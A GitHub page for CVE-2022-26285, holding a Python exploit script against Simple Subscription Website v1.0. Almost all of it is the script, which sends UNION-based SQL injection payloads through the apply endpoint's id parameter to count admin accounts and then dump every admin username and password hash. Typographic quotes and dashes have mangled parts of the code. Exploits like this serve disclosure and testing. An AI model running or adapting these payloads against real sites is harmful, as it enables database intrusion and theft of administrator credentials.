CVE-2022-26285: Multiple-SQLi-in-Simple-Subscription-Company/apply_sqli.py at main · Dir0x/Multiple-SQLi-in-Simple-Subscription-Company
Simple Subscription Website v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the apply endpoint. This vulnerability allows attackers to dump the application’s database via crafted HTTP requests.
#!/usr/bin/python3
# Exploit Title: SQLi in apply endpoint of Simple Subscription Website
# Date: 05/11/2021
# Exploit Author: Daniel Haro
# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Version: 1.0
# Tested on: debian 10, apache, mysql
from requests import get
from re import search
import argparse
args = argparse.ArgumentParser(description="Exploit to SQL injection in view_plan page of Simple Subscription CMS through id parameter")
args.add_argument('-t’, '–target’, help="URL of the victim. Example: http://localhost/plan_application")
args = args.parse_args()
print(“Simple Subscription Website”)
print(“Error based SQL injection exploit”)
count_req = get(args.target + "/?page=apply&id=%27%20union%20select%20null,%20count(*),null,null,null,null,null,null%20from%20admin_list–%20-")
n = search('<h2 class="text-center fs-4">.*’, count_req.text)
n = int(n.group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”))
print(“±-----------------------------±-------------------------------+”)
print(“| username | hash |”)
print(“±-----------------------------±-------------------------------+”)
for i in range(1, n+1):
user = search('<h2 class="text-center fs-4">.*’, get(args.target + “/?page=apply&id=%27%20union%20select%20null,username,null,null,null,null,null,null%20from%20admin_list%20where%20admin_id=” + str(i) + "–%20-").text).group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”).replace("\r", “”)
hash = search('<h2 class="text-center fs-4">.*’, get(args.target + “/?page=apply&id=%27%20union%20select%20null,password,null,null,null,null,null,null%20from%20admin_list%20where%20admin_id=” + str(i) + "–%20-").text).group(0).replace('<h2 class="text-center fs-4">’, ‘’).replace(“</h2>","”).replace("\r", “”)
user = “|” + user + (" "*(30-len(user))) + “|”
print(user + hash + “|”)
print(“±-----------------------------±-------------------------------+”)